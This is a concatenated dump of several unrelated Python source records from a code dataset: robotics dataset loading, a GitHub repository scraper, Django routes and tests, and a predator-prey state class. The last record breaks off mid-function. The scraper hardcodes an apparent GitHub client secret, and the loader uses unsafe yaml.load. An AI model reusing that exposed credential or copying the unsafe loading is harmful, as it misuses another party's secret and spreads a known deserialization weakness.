+{"seq_id":"135312588","text":"import torch\r\nfrom torchvision import datasets\r\nfrom torchvision import transforms\r\nimport yaml\r\n\r\nimport os\r\n\r\ndx = {}\r\n\r\n\r\nclass ImageFolderWithPaths(datasets.ImageFolder):\r\n \"\"\"Custom dataset that includes image file paths. Extends\r\n torchvision.datasets.ImageFolder\r\n \"\"\"\r\n # override the __getitem__ method. this is the method dataloader calls\r\n def __getitem__(self, index):\r\n \"\"\"\r\n Args:\r\n index (int): Index\r\n Returns:\r\n tuple: (sample, target) where target is class_index of the target class.\r\n \"\"\"\r\n path, target = self.samples[index]\r\n sample = self.loader(path)\r\n if self.transform is not None:\r\n sample = self.transform(sample)\r\n if self.target_transform is not None:\r\n target = self.target_transform(target)\r\n pro = getproprioception(self, index, path)\r\n if pro is not None:\r\n # print(path)\r\n # print(type(pro))\r\n tensorpro = torch.tensor(pro)\r\n # print(tensorpro)\r\n # print(type(tensorpro))\r\n # print(transforms.ToTensor())\r\n return sample, target, path, tensorpro\r\n\r\n\r\ndef getfilename(self, index, path, proprioception):\r\n # print(\"the index {}, and path{} \".format(index, path))\r\n # with open(\"./dataset/pro{}_{}.txt\".format(counter, \r\n # proprioseption.header.stamp.secs), 'r') as outputfile:\r\n # print(path)\r\n # maping the image with corresponding pro.\r\n # From: pathcopyfromboth_16-10-2018\\train\\baxter\\images\\image26106_2034.jpg\r\n # To :pathcopyfromboth_16-10-2018\\train\\baxter\\pro\\pro26106_2034.txt\r\n file = path.replace(\"images\", \"pro\")\r\n file = file.replace(\"image\", \"pro\")\r\n file = file.replace(\".jpg\", \".yaml\")\r\n ######\r\n # used for one file with all proproception elements are randomized\r\n \r\n #point to the file path\r\n #open the file\r\n #get the values of the key of file variable name\r\n #if \"train\" not in (self.root) and \"env\" in path:\r\n allprotakenfromonefileisactive = True\r\n if \"train\" not in (self.root) and \"env\" in path and allprotakenfromonefileisactive:\r\n # print(\"validation time\")\r\n # for validation only (val/env/pro/ not used)\r\n # take proprioception information from random file in /randomuncyned/allrandomwhichisuncynedpro.txt.\r\n global dx\r\n if len(dx) == 0:\r\n filespath = os.path.abspath(__package__)\r\n filespath = os.path.dirname(filespath)\r\n #randomproprioceptionfile = filespath + '/' + '20190415' + '/' + 'randomuncyned' + '/' + 'allrandomunsyncedprobasedonproofenvranges.txt'\r\n #randomproprioceptionfile = filespath + '/' + '20190416' + '/' + 'randomuncyned' + '/' + 'allrandomunsyncedprobasedonproofbaxterranges.txt'\r\n \r\n #randomproprioceptionfile = filespath + '/' + '20190429' + '/' + 'randomuncyned' + '/' + 'allrandomunsyncedprobasedonproofenvranges.txt'\r\n #randomproprioceptionfile = filespath + '/' + '20190429' + '/' + 'randomuncyned' + '/' + 'allrandomunsyncedprobasedonproofenvranges_of_training_data.txt'\r\n \r\n #randomproprioceptionfile = filespath + '/' + '20190514-case3' + '/' + 'envrange' + '/' + 'envproinformation_associatedwith_baxtervalpronames.txt'\r\n #randomproprioceptionfile = filespath + '/' + '20190514-case4' + '/' + 'baxterrange' + '/' + 'baxterproinformation_associatedwith_valenvpronames.txt'\r\n\r\n #randomproprioceptionfile = filespath + '/' + '20190521-case3' + '/' + 'envrange' + '/' + 'envproinformation_associatedwith_baxtervalpronames.txt'\r\n #randomproprioceptionfile = filespath + '/' + '20190521-case4' + '/' + 'baxterrange' + '/' + 
'baxterproinformation_associatedwith_valenvpronames.txt'\r\n\r\n #randomproprioceptionfile = filespath + '/' + '20190611-case3' + '/' + 'envrange' + '/' + 'envproinformation_associatedwith_baxtervalpronames.yaml'\r\n #randomproprioceptionfile = filespath + '/' + '20190611-case4' + '/' + 'baxterrange' + '/' + 'baxterproinformation_associatedwith_valenvpronames.yaml'\r\n\r\n randomproprioceptionfile = filespath + '/' + '20190612-case3' + '/' + 'envrange' + '/' + 'envproinformation_associatedwith_baxtervalpronames.yaml'\r\n #randomproprioceptionfile = filespath + '/' + '20190612-case4' + '/' + 'baxterrange' + '/' + 'baxterproinformation_associatedwith_valenvpronames.yaml'\r\n with open(randomproprioceptionfile, 'r') as outputfile:\r\n try:\r\n x = outputfile.read()\r\n except (OSError, UnicodeDecodeError) as exc:\r\n print(exc)\r\n dx = yaml.load(x)\r\n keyAsfilenameonly = os.path.basename(file)\r\n x = dx[keyAsfilenameonly] \r\n ######\r\n else:\r\n with open(file, 'r') as outputfile:\r\n try:\r\n x = outputfile.read()\r\n except (OSError, UnicodeDecodeError) as exc:\r\n print(exc)\r\n # print(type(x))\r\n # print(\"Yaml load the txt file--------------------\")\r\n x = yaml.load(x)\r\n # print(x)\r\n # print(type(x))\r\n if proprioception == \"all\":\r\n return x\r\n else:\r\n return x[proprioception]\r\n \r\ndef getvelocity(self, index, path):\r\n velocity = getfilename(self, index, path, \"velocity\")\r\n return velocity\r\n \r\n\r\ndef geteffort(self, index, path):\r\n effort = getfilename(self, index, path, \"effort\")\r\n return effort\r\n\r\ndef getposition(self, index, path):\r\n position = getfilename(self, index, path, \"position\")\r\n return position\r\n\r\ndef getproprioception(self, index, path):\r\n proprioception = getfilename(self, index, path, \"all\")\r\n #proprioception = proprioception['velocity'] + proprioception['effort'] + proprioception['position'] # len=57\r\n proprioception = proprioception.velocity + proprioception.effort + proprioception.position\r\n return proprioception","sub_path":"customdataset.py","file_name":"customdataset.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"347824554","text":"from builtins import len, open\r\nfrom locale import str\r\nimport requests\r\nimport json\r\nimport pandas as pd\r\nimport time\r\n\r\nclient_id = '6ff8da2ae4d057a6d048' # you have to write your own id\r\nclient_secret = '3b6868e71ae5ef6d14a5d8114a3638e84bc22c7a' # you have to write your own secret\r\n\r\n\r\ndef dict_creator(user_name, repo_list):\r\n df1 = pd.DataFrame(\r\n columns=['Name of repository', 'url', 'Frontend', 'Backend', 'Front/Backend', 'Angular', 'React',\r\n 'Vue', 'Ruby', 'TypeScript', 'JavaScript', 'Java', 'PHP', 'Python', 'MongoDB', 'MySql',\r\n 'PostgreSql'])\r\n\r\n for each_repo in repo_list:\r\n dict1 = {'Name of repository': '', 'url': '', 'Frontend': '', 'Backend': '', 'Front/Backend': '', 'Angular': '',\r\n 'React': '', 'Vue': '', 'Ruby': '', 'TypeScript': '', 'JavaScript': '', 'Java': '', 'PHP': '',\r\n 'Python': '', 'MongoDB': '', 'MySql': '', 'PostgreSql': ''}\r\n try:\r\n link = 'https://raw.githubusercontent.com/' + user_name + '/' + each_repo['repo_name'] + \\\r\n '/master/package.json?client_id=' + client_id + '&client_secret=' + client_secret\r\n page = requests.get(link)\r\n\r\n if page.status_code != 404:\r\n file_content = page.json()\r\n if \"@angular/common\" in file_content['dependencies']:\r\n dict1['TypeScript'] = 'X'\r\n dict1['Angular'] = 'X'\r\n elif \"react\" in file_content['dependencies']:\r\n dict1['JavaScript'] = 'X'\r\n dict1['React'] = 'X'\r\n else:\r\n continue\r\n if dict1:\r\n dict1['Frontend'] = 'X'\r\n dict1['Name of repository'] = each_repo['repo_name']\r\n dict1['url'] = 'https://api.github.com/repos/' + user_name + '/' + each_repo['repo_name']\r\n series = pd.Series(dict1)\r\n series.to_frame()\r\n df1 = df1.append(series, ignore_index=True)\r\n\r\n\r\n except:\r\n continue\r\n return df1\r\n\r\n\r\ndata = pd.DataFrame(\r\n columns=['Name of repository', 'url', 'Frontend', 'Backend', 'Front/Backend', 'Angular', 'React',\r\n 'Vue', 'Ruby', 'TypeScript', 'JavaScript', 'Java', 'PHP', 'Python', 'MongoDB', 'MySql',\r\n 'PostgreSql'])\r\n\r\ndf = pd.DataFrame({'Name of repository': [], 'url': [], 'Frontend': [], 'Backend': [], 'Front/Backend': [],\r\n 'Angular': [], 'React': [], 'Vue': [], 'Ruby': [], 'TypeScript': [], 'JavaScript': [], 'Java': [],\r\n 'PHP': [], 'Python': [], 'MongoDB': [], 'MySql': [], 'PostgreSql': []})\r\n\r\nwith open('Json files/Separated repos((2017-01-01)---(2017-06-30).json') as json_file:\r\n users = json.load(json_file)\r\n\r\ncount = 0\r\n\r\nfor each_user in users:\r\n if len(each_user['front_list']) > 0:\r\n df = df.append(dict_creator(each_user['user_name'], each_user['front_list']))\r\n count += len(each_user['front_list'])\r\n print('Project of user ' + each_user['user_name'] + ' are ready. Added project count: ' + str(count))\r\n\r\n\r\nwriter = pd.ExcelWriter('data3.xlsx', engine='xlsxwriter')\r\ndf.to_excel(writer, 'Sheet1')\r\nwriter.save()\r\n\r\n","sub_path":"Github Repo Finder/Data_creater.py","file_name":"Data_creater.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"274593723","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.overview, name = \"overview\" ),\n path(\"task-list/\",views.tasklist, name=\"tasklist\"),\n path(\"task-detail//\",views.taskdetail, name=\"taskdetail\"),\n path(\"task-create/\",views.taskcreate,name= \"taskcreate\"),\n path(\"task-update/\",views.taskupdate,name= \"taskupdate\"),\n path(\"task-delete/\",views.taskdelete,name=\"taskdelete\")\n]\n","sub_path":"todo_rest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"643583599","text":"#\n# Copyright 2017 Nokia Solutions and Networks\n# Licensed under the Apache License, Version 2.0,\n# see license.txt file for details.\n#\n\n\ndef get_classes_from_module(module_location):\n import os\n from robot import pythonpathsetter\n import importlib\n import pkgutil\n\n module_directory = os.path.dirname(module_location)\n module_name = _find_module_name_by_path(module_location)\n class_names = list()\n\n if module_location.endswith('__init__.py'):\n pythonpathsetter.add_path(os.path.dirname(module_directory))\n module = importlib.import_module(module_name)\n class_names.extend(_find_names_in_module(module, module_name))\n for loader, name, _ in pkgutil.walk_packages([module_directory]):\n try:\n module = loader.find_module(name).load_module(name)\n class_names.extend(_find_names_in_module(module, name))\n except:\n pass # some modules can't be loaded separately\n class_names = [n if n.startswith(module_name) else module_name + \".\" + n for n in class_names]\n\n elif module_location.endswith('.py'):\n pythonpathsetter.add_path(module_directory)\n module = importlib.import_module(module_name)\n class_names.extend(_find_names_in_module(module, module_name))\n\n elif module_location.endswith(\".zip\") or module_location.endswith(\".jar\"):\n pythonpathsetter.add_path(module_location)\n for loader, name, _ in pkgutil.walk_packages([module_location]):\n try:\n module = loader.find_module(name).load_module(name)\n class_names.extend(_find_names_in_archive_module(module, name))\n except:\n pass # some modules can't be loaded separately\n\n else:\n raise Exception('Unrecognized library path: ' + module_location)\n\n return sorted(set(class_names))\n\n\ndef _find_module_path(start_path):\n import os\n\n current_path = os.path.abspath(start_path)\n while True:\n if os.path.isfile(current_path):\n current_path = os.path.dirname(current_path)\n elif os.path.isdir(current_path):\n import sys\n if os.path.exists(current_path + os.sep + '__init__.py') or os.path.basename(current_path) in sys.modules:\n current_path = os.path.normpath(os.path.join(current_path, os.path.pardir))\n else:\n return current_path\n else:\n break\n\n return os.path.abspath(start_path.split(os.sep)[0])\n\n\ndef _find_module_name_by_path(start_path):\n import os\n\n result = start_path\n path_to_module = _find_module_path(start_path)\n if path_to_module != start_path:\n path_to_replace = path_to_module + os.sep\n if path_to_module.endswith(os.sep):\n path_to_replace = path_to_module\n path_to_module = start_path.replace(path_to_replace, '', 1)\n result = path_to_module.replace(os.sep, '.')\n if os.path.isfile(start_path):\n if start_path.endswith('__init__.py'):\n result = result[:-12]\n else:\n _, start_path_extension = os.path.splitext(start_path)\n result = result[:-len(start_path_extension)]\n\n return result\n\n\ndef _find_names_in_module(module, name):\n import inspect\n\n result = list()\n result.append(module.__name__)\n for _, obj in inspect.getmembers(module):\n if inspect.isclass(obj) and obj.__module__.startswith(name):\n result.append(obj.__module__ + \".\" + obj.__name__)\n\n return result\n\n\ndef _find_names_in_archive_module(module, name):\n import inspect\n\n result = list()\n for n, obj in inspect.getmembers(module):\n if inspect.isfunction(obj):\n result.append(obj.__module__)\n if inspect.isclass(obj) and obj.__module__.startswith(name):\n if obj.__module__ != obj.__name__:\n result.append(obj.__module__ + \".\" + obj.__name__)\n else:\n 
result.append(obj.__module__)\n\n return result\n\n\nif __name__ == '__main__':\n import sys\n import json\n\n module_location = sys.argv[1]\n\n if len(sys.argv) > 2:\n sys.path.extend(sys.argv[2].split(';'))\n\n print(json.dumps(get_classes_from_module(module_location)))\n","sub_path":"src/RobotFrameworkCore/org.robotframework.ide.core-functions/src/main/python/scripts/red_module_classes.py","file_name":"red_module_classes.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"158616849","text":"import json\nimport jq\nimport jsonpointer\nimport jsonpath_rw\nimport copy\nimport base64\nimport importlib\nfrom six import string_types\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\nclass LeafModel(object):\n def __init__(self, spec):\n self.datamodel = spec or {\"keyword\": None, \"types\": {}}\n self._types2str, self._str2types = {}, {}\n for name, class_def in list(self.datamodel[\"types\"].items()):\n if type(class_def) == type:\n self._types2str[class_def] = name\n self._str2types[name] = class_def\n elif isinstance(class_def, string_types):\n m, c = class_def.split(\":\")\n c = getattr(importlib.import_module(m), c)\n self._types2str[c] = name\n self._str2types[name] = c\n else:\n raise RuntimeError(\"not sure how to interpret type def %s\", class_def)\n self.keyword = self.datamodel[\"keyword\"]\n self.canonical_leaf_magic = \"b64json://\"\n lits = self.datamodel.get(\"literals\")\n\n self.magics = [self.canonical_leaf_magic]\n\n if lits:\n m, f = lits[\"parser\"].split(\":\")\n self.litparser = getattr(importlib.import_module(m), f)\n self.magics += lits[\"magics\"]\n\n def leaf_encode(self, obj):\n return self.canonical_leaf_magic + base64.b64encode(\n json.dumps(self.dumper(obj)).encode(\"utf-8\")\n ).decode(\"utf-8\")\n\n def leaf_decode(self, encoded):\n for m in self.magics:\n if encoded.startswith(m):\n if m == self.canonical_leaf_magic:\n magic_replaced = encoded.replace(self.canonical_leaf_magic, \"\")\n return json.loads(base64.b64decode(magic_replaced).decode(\"utf-8\"))\n else:\n return self.litparser(encoded)\n raise RuntimeError(\"cannot decode {} \".format(encoded))\n\n def loader(self, spec, idleafs):\n if not self.keyword:\n return spec\n\n found_identifiers = set([self.keyword]).intersection(set(spec.keys()))\n found_identifiers = {k: spec[k] for k in found_identifiers}\n if not found_identifiers:\n return spec\n\n for k in list(found_identifiers.keys()):\n spec.pop(k)\n cl = self._str2types[found_identifiers[self.keyword]]\n obj = cl.fromJSON(spec)\n if not idleafs:\n return obj\n return self.leaf_encode(obj)\n\n def dumper(self, obj):\n json = obj.json()\n if not type(obj) == TypedLeafs:\n try:\n json[self.keyword] = self._types2str[type(obj)]\n except KeyError:\n log.exception(\"could not find type in %s\", self._types2str)\n raise\n return json\n\n\nclass TypedLeafs(object):\n def __init__(self, data, leafmodel=None, idleafs=False):\n self.leafmodel = leafmodel\n self._leafmodel = LeafModel(leafmodel)\n\n if isinstance(data, TypedLeafs):\n data = data.json()\n self._jsonable = data\n\n def __repr__(self):\n return \"\".format(self.typed())\n\n def __getitem__(self, key):\n return self.typed().__getitem__(key)\n\n def __iter__(self):\n return self.typed().__iter__()\n\n def __len__(self):\n return self.typed().__len__()\n\n def __delitem__(self, key):\n self._jsonable.__delitem__(key)\n\n def __setitem__(self, key, value):\n data = self._jsonable\n data.__setitem__(key, value)\n self._jsonable = data\n\n def __normalize(self, idleafs=True):\n # wrap in a simple dict, necessary for if data is just a leaf value\n data = {\n \"data\": self._load_from_string(\n self._dump_to_string(self._jsonable), typed=False\n )\n }\n if idleafs:\n magicexpr = \" or \".join(\n ['startswith(\"{}\")'.format(m) for m in self._leafmodel.magics]\n )\n ptrs = [\n jsonpointer.JsonPointer.from_parts(x)\n for x in jq.jq(\n 'paths(type==\"string\" and ({}))'.format(magicexpr)\n ).transform(data, multiple_output=True)\n ]\n for p in ptrs:\n 
p.set(data, self._leafmodel.leaf_decode(p.get(data)))\n self.__jsonable = data[\"data\"]\n\n @property\n def _jsonable(self):\n return self.__jsonable\n\n @_jsonable.setter\n def _jsonable(self, value):\n pass\n self.__jsonable = value\n self.__normalize()\n\n @classmethod\n def fromJSON(cls, data, deserialization_opts):\n return cls(\n data,\n deserialization_opts.get(\"leafmodel\", None),\n deserialization_opts.get(\"idleafs\", False),\n )\n\n def _load_from_string(self, jsonstring, typed=True, idleafs=False):\n if typed:\n data = json.loads(\n jsonstring,\n object_hook=lambda spec: self._leafmodel.loader(spec, idleafs),\n )\n return data\n else:\n return json.loads(jsonstring)\n\n def _dump_to_string(self, data):\n return json.dumps(data, default=self._leafmodel.dumper)\n\n def replace(self, path, value):\n self._jsonable = TypedLeafs(\n path.set(self.json(), value, inplace=False), self.leafmodel\n ).json()\n\n ### representation methods\n def json(self):\n return self._jsonable\n\n def typed(self, idleafs=False):\n return self._load_from_string(\n json.dumps(self._jsonable, sort_keys=True), typed=True, idleafs=idleafs\n )\n\n def copy(self):\n return TypedLeafs(copy.deepcopy(self.typed()), self.leafmodel)\n\n def asrefs(self, callback=None):\n data = self.copy().json()\n for p, v in self.leafs():\n if p.path == \"\":\n return p if not callback else callback(p)\n p.set(data, p if not callback else callback(p))\n return data\n\n ### QUERY methods\n def resolve_ref(self, reference):\n return reference.get(self.typed())\n\n def jsonpointer(self, pointer_str):\n return jsonpointer.JsonPointer(pointer_str).resolve(self.typed())\n\n def jsonpath(self, jsonpath_expression, multiple_output=False):\n if not multiple_output:\n return jsonpath_rw.parse(jsonpath_expression).find(self.typed())[0].value\n else:\n return [\n x.value\n for x in jsonpath_rw.parse(jsonpath_expression).find(self.typed())\n ]\n\n def jq(self, jq_program, *args, **kwargs):\n return TypedLeafs(\n jq.jq(jq_program).transform(self.typed(idleafs=True), *args, **kwargs),\n self.leafmodel,\n idleafs=True,\n )\n\n def leafs(self):\n if not isinstance(self.typed(), (list, dict)):\n yield jsonpointer.JsonPointer(\"\"), self.typed()\n else:\n ptrs = [\n jsonpointer.JsonPointer.from_parts(parts)\n for parts in self.jq(\"leaf_paths\", multiple_output=True).typed()\n ]\n for p in ptrs:\n yield p, p.get(self.typed())\n","sub_path":"packtivity/typedleafs.py","file_name":"typedleafs.py","file_ext":"py","file_size_in_byte":7177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"366037657","text":"# -*- coding: utf-8 -*-\nfrom collections import defaultdict\nfrom ordereddict import OrderedDict\nfrom zeit.cms.repository.folder import Folder\nfrom zeit.content.article.testing import create_article\nfrom zeit.content.volume.browser.toc import Toc, Excluder\nfrom zeit.content.volume.volume import Volume\nimport lxml.etree\nimport mock\nimport sys\nimport zeit.cms.content.add\nimport zeit.cms.content.sources\nimport zeit.cms.testing\nimport zeit.content.volume.interfaces\nimport zeit.content.volume.testing\nimport zope.component\n\n\nclass TocFunctionalTest(zeit.content.volume.testing.FunctionalTestCase):\n\n def setUp(self):\n super(TocFunctionalTest, self).setUp()\n self.toc_data = OrderedDict()\n self.toc_data['Die Zeit'] = OrderedDict(\n {'Politik': [{'page': '1',\n 'title': 'title',\n 'teaser': 'tease',\n 'access': u'frei verfügbar',\n 'supertitle': 'Super'}]\n }\n )\n self.toc_data['Anderer'] = OrderedDict(\n {'Dossier': [\n {'page': '1',\n 'access': u'frei verfügbar',\n 'title': 'title',\n 'teaser': 'tease',\n 'supertitle': 'Super'\n },\n {'page': '3',\n 'access': u'frei verfügbar',\n 'title': 'title2',\n 'teaser': 'tease',\n 'supertitle': 'Super'}\n ]}\n )\n self.article_xml_template = u\"\"\"\n \n \n {page}\n free\n \n \n Titel\n Das soll der Teaser\n sein\n \n \n \"\"\"\n\n def test_list_relevant_ressort_folders_excludes_leserbriefe_and_images(\n self):\n toc = Toc(mock.Mock(), mock.Mock())\n toc_connector = zope.component.getUtility(\n zeit.content.volume.interfaces.ITocConnector)\n self.zca.patch_utility(toc_connector,\n zeit.connector.interfaces.IConnector)\n folders = ['images', 'leserbriefe', 'politik']\n with zeit.cms.testing.site(self.getRootFolder()):\n self.repository['ZEI'] = Folder()\n self.repository['ZEI']['2015'] = Folder()\n self.repository['ZEI']['2015']['01'] = Folder()\n for foldername in folders:\n self.repository['ZEI']['2015']['01'][foldername] = Folder()\n relevant_ressorts = toc.list_relevant_ressort_folders(\n 'http://xml.zeit.de'\n '/ZEI/2015/01')\n foldernames = [folder.__name__ for folder in relevant_ressorts]\n self.assertIn('politik', foldernames)\n self.zca.reset()\n\n def test_create_toc_element_should_flatten_linebreaks(self):\n article_xml = self.article_xml_template.format(page='20-20')\n expected = {'page': 20,\n 'title': 'Titel',\n 'teaser': 'Das soll der Teaser sein',\n 'supertitle': '',\n 'access': u'frei verfügbar'\n }\n article_element = lxml.etree.fromstring(article_xml)\n toc = Toc(mock.Mock(), mock.Mock())\n result = toc._create_toc_element(article_element)\n self.assertEqual(expected, result)\n\n def test_csv_is_created_from_toc_data(self):\n expected = \"\"\"Die Zeit\\r\n\\tPolitik\\r\n1\\tSuper title tease\\t\\t\\t\\tfrei verfügbar\\r\nAnderer\\r\n\\tDossier\\r\n1\\tSuper title tease\\t\\t\\t\\tfrei verfügbar\\r\n3\\tSuper title2 tease\\t\\t\\t\\tfrei verfügbar\\r\n\"\"\"\n toc = Toc(mock.Mock(), mock.Mock())\n res = toc._create_csv(self.toc_data)\n self.assertEqual(expected, res)\n\n def test_empty_page_node_in_xml_results_in_max_int_page_in_toc_entry(self):\n article_xml = self.article_xml_template.format(page='')\n article_element = lxml.etree.fromstring(article_xml)\n t = Toc(mock.Mock(), mock.Mock())\n entry = t._create_toc_element(article_element)\n assert sys.maxint == entry.get('page')\n\n def test_product_id_mapping_has_full_name_for_zei_product_id(self):\n mapping = zeit.content.volume.interfaces.PRODUCT_MAPPING\n self.assertEqual('Die Zeit'.lower(), mapping.get('ZEI', '').lower())\n\n def 
test_sorts_entries_with_max_int_page_as_last_toc_element(self):\n toc_data = {\n 'Die Zeit': {\n 'Politik':\n [\n {'page': sys.maxint, 'title': 'title2'},\n {'page': 1, 'title': 'title1'}\n ]\n }\n }\n toc_data = OrderedDict(toc_data)\n t = Toc(mock.Mock(), mock.Mock())\n result = t._sort_toc_data(toc_data)\n assert sys.maxint == result.get('Die Zeit').get('Politik')[-1].get(\n 'page')\n\n def test_article_excluder_excludes_blacklisted_property_values(self):\n excluder = Excluder()\n xml_template = u\"\"\"\n \n \n {d[jobname]}\n \n \n {d[title]}\n {d[supertitle]}\n \n \n \"\"\"\n for values in [{'title': u'Heute 20.02.2016'},\n {'supertitle': u'WIR RATEN AB'},\n {'jobname': u'AS-Zahl'}]:\n xml = xml_template.format(d=defaultdict(str, **values))\n self.assertEqual(False,\n excluder.is_relevant(lxml.etree.fromstring(xml)))\n\n def test_init_toc_connector_is_registered_as_connector(self):\n old_connector = zope.component.getUtility(\n zeit.connector.interfaces.IConnector)\n # register_archive_connector is called in __init__\n # check for the correct side effects\n t = Toc(mock.Mock(), mock.Mock())\n new_connector = zope.component.getUtility(\n zeit.connector.interfaces.IConnector)\n # Check if a new IConnector was registered\n assert old_connector is not new_connector\n # Check if the toc.connector is the ITocConnector\n assert t.connector is zope.component.getUtility(\n zeit.content.volume.interfaces.ITocConnector)\n assert t.connector is zope.component.getUtility(\n zeit.connector.interfaces.IConnector)\n\n\nclass TocBrowserTest(zeit.cms.testing.BrowserTestCase):\n layer = zeit.content.volume.testing.ZCML_LAYER\n\n def setUp(self):\n super(TocBrowserTest, self).setUp()\n # Create the volume object with the mock IConnector\n volume = Volume()\n volume.year = 2015\n volume.volume = 1\n volume.product = zeit.cms.content.sources.Product(u'ZEI')\n self.article_title = 'Ein Test Titel'\n self.ressort_names = ['dossier', 'politik']\n self.article_page = 1\n zeit.cms.content.add.find_or_create_folder('2015', '01')\n self.repository['2015']['01']['ausgabe'] = volume\n # Now use the mock ITocConnector to mock the archive folders and the\n # article\n toc_connector = zope.component.getUtility(\n zeit.content.volume.interfaces.ITocConnector)\n self.zca.patch_utility(toc_connector,\n zeit.connector.interfaces.IConnector)\n with zeit.cms.testing.site(self.getRootFolder()):\n for ressort_name in self.ressort_names:\n zeit.cms.content.add.find_or_create_folder('ZEI', '2015',\n '01', ressort_name)\n with zeit.cms.testing.interaction():\n article = create_article()\n article.year = 2015\n article.volume = 1\n article.title = self.article_title\n article.page = self.article_page\n self.repository['ZEI']['2015']['01']['politik'][\n 'test_artikel'] = article\n self.zca.reset()\n\n def test_toc_view_is_csv_file_download(self):\n b = self.browser\n with mock.patch('zeit.content.volume.browser'\n '.toc.Toc._create_toc_content') as create_content:\n create_content.return_value = 'some csv'\n b.open('http://localhost/++skin++vivi/repository/'\n '2015/01/ausgabe/@@toc.csv')\n self.assertEqual('text/csv', b.headers['content-type'])\n self.assertEqual('attachment; '\n 'filename=\"table_of_content_2015_01.csv\"',\n b.headers['content-disposition'])\n self.assertEllipsis(\"some csv\", b.contents)\n\n def test_toc_generates_csv(self):\n b = self.browser\n b.open('http://localhost/++skin++vivi/repository/'\n '2015/01/ausgabe/@@toc.csv')\n self.assertIn(self.article_title, b.contents)\n self.assertIn(str(self.article_page), 
b.contents)\n for ressort_name in self.ressort_names:\n self.assertIn(ressort_name.title(), b.contents)\n self.assertIn('DIE ZEIT'.lower(), b.contents.lower())\n","sub_path":"src/zeit/content/volume/browser/tests/test_toc.py","file_name":"test_toc.py","file_ext":"py","file_size_in_byte":9562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"234817247","text":"# -*- coding: utf-8 -*-\nfrom copy import deepcopy\n\nclass State:\n original = []\n agents = []\n uid = ''\n transformation = None\n vof = None\n rows = 15\n cols = 15\n collision = False # Used for determining the move of the other predator\n \n def __init__(self, agents = [], vof = 15):\n self.vof = vof;\n self.original = deepcopy(agents)\n self.agents = agents\n #self.transformation = self.normalize()\n #self.reduce()\n self.getUniqueId()\n \n\n def getUniqueId(self):\n \n # compare all the preds and all preys\n if self.uid != '':\n return self.uid\n \n self.agents.sort()\n \n for agent in self.agents:\n x = int(agent['x'])\n y = int(agent['y'])\n\n self.uid = self.uid + '(' + str(x) + ',' + str(y) + ') '\n\n return self.uid\n \n def comp(self, state):\n if self.uniqueId == state.uniqueId: \n return True\n else: \n return False\n \n def normalize( self ):\n\n agents = self.agents\n\n # Initialize a fake prey for the case when no prey is present\n firstPrey = {'obj': 'prey', 'x': 0, 'y': 0}\n\t\t\n for a in agents:\n if a['obj'] == 'prey':\n firstPrey = a\n break\n\t\t\t\n # Lets flip diagonally (swap x and y) if necessary\n flipD = abs(firstPrey['y']) < abs(firstPrey['x'])\n if firstPrey['y'] == firstPrey['x']:\n for a in agents:\n if a['y'] < a['x']:\n flipD = True\n break;\n if a['y'] > a['x']:\n flipD = False\n break;\n\n if flipD:\n for a in agents:\n x = a['x']\n a['x'] = a['y']\n a['y'] = x\n \n # Lets flip horizontally (invert x) if necessary\n flipH = firstPrey['x'] < 0\n if firstPrey['x'] == 0:\n for a in agents:\n if a['x'] < 0:\n flipH = True\n break;\n if a['x'] > 0:\n flipH = False\n break;\n\n if flipH:\n for a in agents:\n a['x'] = - a['x']\n\n # Lets flip vertically (invert y) if necessary\n flipV = firstPrey['y'] < 0\n if firstPrey['y'] == 0:\n for a in agents:\n if a['y'] < 0:\n flipV = True\n break;\n if a['y'] > 0:\n flipV = False\n break;\n\n if flipV:\n for a in agents:\n a['y'] = - a['y']\n\n return [flipD, flipH, flipV]\n\n\n def transformState( self ):\n\n agents = self.agents\n\n [flipD, flipH, flipV] = self.transformation;\n\n # Lets flip vertically (invert y) if necessary\n if flipV:\n for a in agents:\n a['y'] = - a['y']\n\n # Lets flip horizontally (invert x) if necessary\n if flipH:\n for a in agents:\n a['x'] = - a['x']\n\n # Lets flip diagonally (swap x and y) if necessary\n if flipD:\n for a in agents:\n x = a['x']\n a['x'] = a['y']\n a['y'] = x\n\n def transformAction( self, action ):\n\n [flipD, flipH, flipV] = self.transformation;\n\n # Lets flip vertically (invert y) if necessary\n if flipV:\n if action == 0:\n action = 2\n elif action == 2:\n action = 0\n\n # Lets flip horizontally (invert x) if necessary\n if flipH:\n if action == 1:\n action = 3\n elif action == 3:\n action = 1\n\n # Lets flip diagonally (swap x and y) if necessary\n if flipD:\n if action == 0:\n action = 1\n elif action == 1:\n action = 0\n elif action == 2:\n action = 3\n elif action == 3:\n action = 2\n\n def reduce( self ):\n for a in self.agents:\n x = a['x']\n y = a['y']\n d = abs(x) + abs(y)\n if d > self.vof:\n x = int(round(float(x) / d * self.vof))\n y = int(round(float(y) / d * self.vof))\n # print 'Reduce: |%d,%d| = %d --> |%d,%d| = %d' % (a['x'], a['y'], d, x, y, abs(x)+abs(y))\n a['x'] = x\n a['y'] = y\n\n def determineAction( self, prev, action, i ):\n \n if prev == None:\n return 4\n \n agentPrev = deepcopy(prev.original[i])\n agentCurr = deepcopy(self.original[i])\n \n if prev.collision:\n agentCurr['x'] = 0\n agentCurr['y'] = 0\n 
